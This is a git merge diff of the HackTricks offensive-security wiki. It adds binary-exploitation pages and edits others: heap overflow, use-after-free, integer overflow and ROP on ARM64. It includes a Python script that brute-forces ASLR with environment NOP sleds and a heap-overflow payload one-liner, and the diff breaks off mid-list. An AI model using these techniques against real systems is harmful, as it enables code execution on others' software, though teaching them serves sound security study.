Merge branch 'HackTricks-wiki:master' into master
BIN
.gitbook/assets/image (1202).png
Normal file
After Width: | Height: | Size: 599 KiB |
BIN
.gitbook/assets/image (1203).png
Normal file
After Width: | Height: | Size: 248 KiB |
BIN
.gitbook/assets/image (1204).png
Normal file
After Width: | Height: | Size: 220 KiB |
BIN
.gitbook/assets/image (1205).png
Normal file
After Width: | Height: | Size: 131 KiB |
BIN
.gitbook/assets/image (1206).png
Normal file
After Width: | Height: | Size: 124 KiB |
BIN
.gitbook/assets/image (1207).png
Normal file
After Width: | Height: | Size: 29 KiB |
BIN
.gitbook/assets/image (1208).png
Normal file
After Width: | Height: | Size: 94 KiB |
BIN
.gitbook/assets/image (1209).png
Normal file
After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (1210).png
Normal file
After Width: | Height: | Size: 238 KiB |
BIN
.gitbook/assets/image (1211).png
Normal file
After Width: | Height: | Size: 218 KiB |
BIN
.gitbook/assets/image (1212).png
Normal file
After Width: | Height: | Size: 188 KiB |
BIN
.gitbook/assets/image (1213).png
Normal file
After Width: | Height: | Size: 36 KiB |
BIN
.gitbook/assets/image (1214).png
Normal file
After Width: | Height: | Size: 213 KiB |
BIN
.gitbook/assets/image (1215).png
Normal file
After Width: | Height: | Size: 244 KiB |
BIN
.gitbook/assets/image (1216).png
Normal file
After Width: | Height: | Size: 209 KiB |
BIN
.gitbook/assets/image (1217).png
Normal file
After Width: | Height: | Size: 562 KiB |
BIN
.gitbook/assets/image (1218).png
Normal file
After Width: | Height: | Size: 297 KiB |
BIN
.gitbook/assets/image (1219).png
Normal file
After Width: | Height: | Size: 230 KiB |
BIN
.gitbook/assets/image (1220).png
Normal file
After Width: | Height: | Size: 45 KiB |
BIN
.gitbook/assets/image (1221).png
Normal file
After Width: | Height: | Size: 247 KiB |
BIN
.gitbook/assets/image (1222).png
Normal file
After Width: | Height: | Size: 394 KiB |
BIN
.gitbook/assets/image (1223).png
Normal file
After Width: | Height: | Size: 258 KiB |
2
.github/pull_request_template.md
vendored
|
@ -1,7 +1,7 @@
|
||||||
You can remove this content before sending the PR:
|
You can remove this content before sending the PR:
|
||||||
|
|
||||||
## Attribution
|
## Attribution
|
||||||
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or have explicit permission to use from the original author. Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
|
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
|
||||||
|
|
||||||
|
|
||||||
Thank you for contributing to HackTricks!
|
Thank you for contributing to HackTricks!
|
||||||
|
|
|
@ -112,7 +112,7 @@ You can **create a free account** [**here**](https://serpapi.com/users/sign\_up)
|
||||||
|
|
||||||
### [WebSec](https://websec.nl/)
|
### [WebSec](https://websec.nl/)
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
|
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
|
||||||
|
|
||||||
|
@ -122,7 +122,7 @@ Another cool thing about WebSec is that unlike the industry average WebSec is **
|
||||||
|
|
||||||
In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||||
|
|
||||||
## License & Disclaimer
|
## License & Disclaimer
|
||||||
|
|
||||||
|
|
18
SUMMARY.md
|
@ -526,7 +526,8 @@
|
||||||
* [BrowExt - XSS Example](pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md)
|
* [BrowExt - XSS Example](pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md)
|
||||||
* [Bypass Payment Process](pentesting-web/bypass-payment-process.md)
|
* [Bypass Payment Process](pentesting-web/bypass-payment-process.md)
|
||||||
* [Captcha Bypass](pentesting-web/captcha-bypass.md)
|
* [Captcha Bypass](pentesting-web/captcha-bypass.md)
|
||||||
* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception.md)
|
* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception/README.md)
|
||||||
|
* [Cache Poisoning to DoS](pentesting-web/cache-deception/cache-poisoning-to-dos.md)
|
||||||
* [Clickjacking](pentesting-web/clickjacking.md)
|
* [Clickjacking](pentesting-web/clickjacking.md)
|
||||||
* [Client Side Template Injection (CSTI)](pentesting-web/client-side-template-injection-csti.md)
|
* [Client Side Template Injection (CSTI)](pentesting-web/client-side-template-injection-csti.md)
|
||||||
* [Client Side Path Traversal](pentesting-web/client-side-path-traversal.md)
|
* [Client Side Path Traversal](pentesting-web/client-side-path-traversal.md)
|
||||||
|
@ -689,10 +690,12 @@
|
||||||
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
|
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
|
||||||
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
|
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
|
||||||
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
|
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
|
||||||
* [Stack Shellcode](binary-exploitation/stack-overflow/stack-shellcode.md)
|
|
||||||
* [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
|
||||||
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
|
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
|
||||||
* [Ret2win](binary-exploitation/stack-overflow/ret2win.md)
|
* [Ret2win](binary-exploitation/stack-overflow/ret2win/README.md)
|
||||||
|
* [Ret2win - arm64](binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md)
|
||||||
|
* [Stack Shellcode](binary-exploitation/stack-overflow/stack-shellcode/README.md)
|
||||||
|
* [Stack Shellcode - arm64](binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md)
|
||||||
|
* [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
||||||
* [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
* [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
||||||
* [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
|
* [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||||
* [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
* [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
||||||
|
@ -702,13 +705,18 @@
|
||||||
* [Leaking libc address with ROP](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md)
|
* [Leaking libc address with ROP](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md)
|
||||||
* [Leaking libc - template](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md)
|
* [Leaking libc - template](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md)
|
||||||
* [One Gadget](binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md)
|
* [One Gadget](binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md)
|
||||||
* [Ret2syscall](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv.md)
|
* [Ret2lib + Printf leak - arm64](binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md)
|
||||||
|
* [Ret2syscall](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md)
|
||||||
|
* [Ret2syscall - ARM64](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md)
|
||||||
* [Ret2vDSO](binary-exploitation/rop-return-oriented-programing/ret2vdso.md)
|
* [Ret2vDSO](binary-exploitation/rop-return-oriented-programing/ret2vdso.md)
|
||||||
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming.md)
|
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming.md)
|
||||||
* [Array Indexing](binary-exploitation/array-indexing.md)
|
* [Array Indexing](binary-exploitation/array-indexing.md)
|
||||||
* [Integer Overflow](binary-exploitation/integer-overflow.md)
|
* [Integer Overflow](binary-exploitation/integer-overflow.md)
|
||||||
* [Format Strings](binary-exploitation/format-strings/README.md)
|
* [Format Strings](binary-exploitation/format-strings/README.md)
|
||||||
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
|
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
|
||||||
|
* [Heap](binary-exploitation/heap/README.md)
|
||||||
|
* [Use After Free](binary-exploitation/heap/use-after-free.md)
|
||||||
|
* [Heap Overflow](binary-exploitation/heap/heap-overflow.md)
|
||||||
* [Common Binary Exploitation Protections & Bypasses](binary-exploitation/common-binary-protections-and-bypasses/README.md)
|
* [Common Binary Exploitation Protections & Bypasses](binary-exploitation/common-binary-protections-and-bypasses/README.md)
|
||||||
* [ASLR](binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md)
|
* [ASLR](binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md)
|
||||||
* [Ret2plt](binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md)
|
* [Ret2plt](binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md)
|
||||||
|
|
|
@ -89,7 +89,7 @@ Something to take into account is that usually **just one exploitation of a vuln
|
||||||
|
|
||||||
#### Via syscalls
|
#### Via syscalls
|
||||||
|
|
||||||
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv.md): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**.
|
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**.
|
||||||
* If [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries.
|
* If [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries.
|
||||||
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming.md) can be useful to prepare the **ret2execve**
|
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming.md) can be useful to prepare the **ret2execve**
|
||||||
* Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers
|
* Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers
|
||||||
|
|
|
@ -98,9 +98,80 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
|
||||||
* If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
|
* If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
In 64bit systems the entropy is much higher and this isn't possible.
|
In 64bit systems the entropy is much higher and this shouldn't possible.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
|
### 64 bits stack brute-forcing
|
||||||
|
|
||||||
|
It's possible to occupy a big part of the stack with env variables and then try to abuse the binary hundreds/thousands of times locally to exploit it.\
|
||||||
|
The following code shows how it's possible to **just select an address in the stack** and every **few hundreds of executions** that address will contain the **NOP instruction**:
|
||||||
|
|
||||||
|
```c
|
||||||
|
//clang -o aslr-testing aslr-testing.c -fno-stack-protector -Wno-format-security -no-pie
|
||||||
|
#include <stdio.h>
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
unsigned long long address = 0xffffff1e7e38;
|
||||||
|
unsigned int* ptr = (unsigned int*)address;
|
||||||
|
unsigned int value = *ptr;
|
||||||
|
printf("The 4 bytes from address 0xffffff1e7e38: 0x%x\n", value);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
```python
|
||||||
|
import subprocess
|
||||||
|
import traceback
|
||||||
|
|
||||||
|
# Start the process
|
||||||
|
nop = b"\xD5\x1F\x20\x03" # ARM64 NOP transposed
|
||||||
|
n_nops = int(128000/4)
|
||||||
|
shellcode_env_var = nop * n_nops
|
||||||
|
|
||||||
|
# Define the environment variables you want to set
|
||||||
|
env_vars = {
|
||||||
|
'a': shellcode_env_var,
|
||||||
|
'b': shellcode_env_var,
|
||||||
|
'c': shellcode_env_var,
|
||||||
|
'd': shellcode_env_var,
|
||||||
|
'e': shellcode_env_var,
|
||||||
|
'f': shellcode_env_var,
|
||||||
|
'g': shellcode_env_var,
|
||||||
|
'h': shellcode_env_var,
|
||||||
|
'i': shellcode_env_var,
|
||||||
|
'j': shellcode_env_var,
|
||||||
|
'k': shellcode_env_var,
|
||||||
|
'l': shellcode_env_var,
|
||||||
|
'm': shellcode_env_var,
|
||||||
|
'n': shellcode_env_var,
|
||||||
|
'o': shellcode_env_var,
|
||||||
|
'p': shellcode_env_var,
|
||||||
|
}
|
||||||
|
|
||||||
|
cont = 0
|
||||||
|
while True:
|
||||||
|
cont += 1
|
||||||
|
|
||||||
|
if cont % 10000 == 0:
|
||||||
|
break
|
||||||
|
|
||||||
|
print(cont, end="\r")
|
||||||
|
# Define the path to your binary
|
||||||
|
binary_path = './aslr-testing'
|
||||||
|
|
||||||
|
try:
|
||||||
|
process = subprocess.Popen(binary_path, env=env_vars, stdout=subprocess.PIPE, text=True)
|
||||||
|
output = process.communicate()[0]
|
||||||
|
if "0xd5" in str(output):
|
||||||
|
print(str(cont) + " -> " + output)
|
||||||
|
except Exception as e:
|
||||||
|
print(e)
|
||||||
|
print(traceback.format_exc())
|
||||||
|
pass
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1211).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### Local Information (`/proc/[pid]/stat`)
|
### Local Information (`/proc/[pid]/stat`)
|
||||||
|
|
||||||
The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as:
|
The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as:
|
||||||
|
|
|
@ -22,7 +22,7 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
|
||||||
|
|
||||||
* It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/) **to bypass** this protection by executing chunks of executable code already present in the binary.
|
* It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/) **to bypass** this protection by executing chunks of executable code already present in the binary.
|
||||||
* [**Ret2libc**](../rop-return-oriented-programing/ret2lib/)
|
* [**Ret2libc**](../rop-return-oriented-programing/ret2lib/)
|
||||||
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv.md)
|
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/)
|
||||||
* **Ret2...**
|
* **Ret2...**
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
2
binary-exploitation/heap/README.md
Normal file
|
@ -0,0 +1,2 @@
|
||||||
|
# Heap
|
||||||
|
|
47
binary-exploitation/heap/heap-overflow.md
Normal file
|
@ -0,0 +1,47 @@
|
||||||
|
# Heap Overflow
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Basic Information
|
||||||
|
|
||||||
|
A heap overflow is like a [**stack overflow**](../stack-overflow/) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.**
|
||||||
|
|
||||||
|
In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this.
|
||||||
|
|
||||||
|
{% hint style="success" %}
|
||||||
|
In order to find overflow offsets you can use the same patters as in [**stack overflows**](../stack-overflow/#finding-stack-overflows-offsets).
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
## Example ARM64
|
||||||
|
|
||||||
|
In the page [https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/](https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/) you can find a heap overflow example where a command that is going to be executed is stored in the following chunk from the overflowed chunk. So, it's possible to modify the executed command by overwriting it with an easy exploit such as:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
40
binary-exploitation/heap/use-after-free.md
Normal file
|
@ -0,0 +1,40 @@
|
||||||
|
# Use After Free
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Basic Information
|
||||||
|
|
||||||
|
As the name implies, this vulnerability occurs when a program **stores some space** in the heap for an object, **writes** some info there, **frees** it apparently because it's not needed anymore and then **accesses it again**.
|
||||||
|
|
||||||
|
The problem here is that it's not ilegal (there **won't be errors**) when a **freed memory is accessed**. So, if the program (or the attacker) managed to **allocate the freed memory and store arbitrary data**, when the freed memory is accessed from the initial pointer that **data would be have been overwritten** causing a **vulnerability that will depends on the sensitivity of the data** that was stored original (if it was a pointer of a function that was going to be be called, an attacker could know control it).
|
||||||
|
|
||||||
|
## Other References & Examples
|
||||||
|
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-2-use-after-free/](https://8ksec.io/arm64-reversing-and-exploitation-part-2-use-after-free/)
|
||||||
|
* ARM64. Use after free: Generate a user, free it, reuse the same chunk **overwriting the position of user->password** from the previous one. Reuse the user to **bypass the password check**
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -112,18 +112,19 @@ In this example, if a user inputs a negative number, it will be interpreted as a
|
||||||
### Other Examples
|
### Other Examples
|
||||||
|
|
||||||
* [https://guyinatuxedo.github.io/35-integer\_exploitation/int\_overflow\_post/index.html](https://guyinatuxedo.github.io/35-integer\_exploitation/int\_overflow\_post/index.html)
|
* [https://guyinatuxedo.github.io/35-integer\_exploitation/int\_overflow\_post/index.html](https://guyinatuxedo.github.io/35-integer\_exploitation/int\_overflow\_post/index.html)
|
||||||
* The program is only validating the lastbyte of a number to check for the size of the input, therefore it's possible to add any zie as long as the last byte is inside the allowed range. Then, the input creates a buffer overflow exploited with a ret2win.
|
* Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection
|
||||||
* [https://guyinatuxedo.github.io/35-integer\_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer\_exploitation/puzzle/index.html)
|
* [https://guyinatuxedo.github.io/35-integer\_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer\_exploitation/puzzle/index.html)
|
||||||
* Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one: 
|
* Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one: 
|
||||||
|
|
||||||
```
|
```
|
||||||
(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569)
|
(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569)
|
||||||
```
|
```
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/)
|
||||||
|
* Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection and overwrite in the stack the next local variable and bypass both protections
|
||||||
|
|
||||||
\
|
## ARM64
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/).
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
|
|
@ -159,6 +159,18 @@ In this example:
|
||||||
Since **x64 uses registers for the first few arguments,** it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. The increased number of registers and the larger address space in **x64** architecture provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP).
|
Since **x64 uses registers for the first few arguments,** it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. The increased number of registers and the larger address space in **x64** architecture provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP).
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
|
## ROP chain in ARM64 Example
|
||||||
|
|
||||||
|
### **ARM64 Basics & Calling conventions**
|
||||||
|
|
||||||
|
Check the following page for this information:
|
||||||
|
|
||||||
|
{% content-ref url="../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Protections Against ROP
|
## Protections Against ROP
|
||||||
|
|
||||||
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution.
|
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution.
|
||||||
|
@ -177,8 +189,8 @@ Notice that ROP is just a technique in order to execute arbitrary code. Based in
|
||||||
|
|
||||||
* **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands.
|
* **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands.
|
||||||
|
|
||||||
{% content-ref url="rop-syscall-execv.md" %}
|
{% content-ref url="rop-syscall-execv/" %}
|
||||||
[rop-syscall-execv.md](rop-syscall-execv.md)
|
[rop-syscall-execv](rop-syscall-execv/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
* **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).
|
* **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).
|
||||||
|
@ -192,6 +204,8 @@ Notice that ROP is just a technique in order to execute arbitrary code. Based in
|
||||||
* [https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions)
|
* [https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions)
|
||||||
* [https://guyinatuxedo.github.io/15-partial\_overwrite/hacklu15\_stackstuff/index.html](https://guyinatuxedo.github.io/15-partial\_overwrite/hacklu15\_stackstuff/index.html)
|
* [https://guyinatuxedo.github.io/15-partial\_overwrite/hacklu15\_stackstuff/index.html](https://guyinatuxedo.github.io/15-partial\_overwrite/hacklu15\_stackstuff/index.html)
|
||||||
* 64 bit, Pie and nx enabled, no canary, overwrite RIP with a `vsyscall` address with the sole purpose or return to the next address in the stack which will be a partial overwrite of the address to get the part of the function that leaks the flag
|
